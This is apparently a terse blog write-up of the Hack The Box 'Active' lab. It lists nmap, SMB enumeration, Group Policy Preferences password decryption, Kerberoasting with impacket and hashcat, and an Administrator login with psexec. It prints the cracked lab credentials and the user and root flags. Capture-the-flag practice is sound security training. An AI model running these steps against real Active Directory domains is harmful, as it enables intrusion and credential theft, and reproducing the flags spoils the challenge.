Wargame/Hack The Box

[HTB] Active Writeup

Vardy 2022. 5. 10. 18:08

nmap -sC -sS -sV -p- -O -o scanResult.txt 10.129.160.75

nmap --script vuln 10.129.160.75 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49171,49175,49176 -o nmapVulnScanResult.txt

smbmap -H 10.129.160.75
smbclient \\\\10.129.160.75\\Replication

smb: \> recurse on
smb: \> prompt off
smb: \> ls

python3 gpp-decrypt.py -f Groups.xml

get user.txt(mget *)

 

* Kerberoast Attack

sudo python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.160.75 -request

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

impacket-psexec Administrator:Ticketmaster1968@10.129.160.75

[user] 99a7b414b71cd9ab9c0970ab27cd40b2

[root] f4c639088936d6591d39034fd993c896

반응형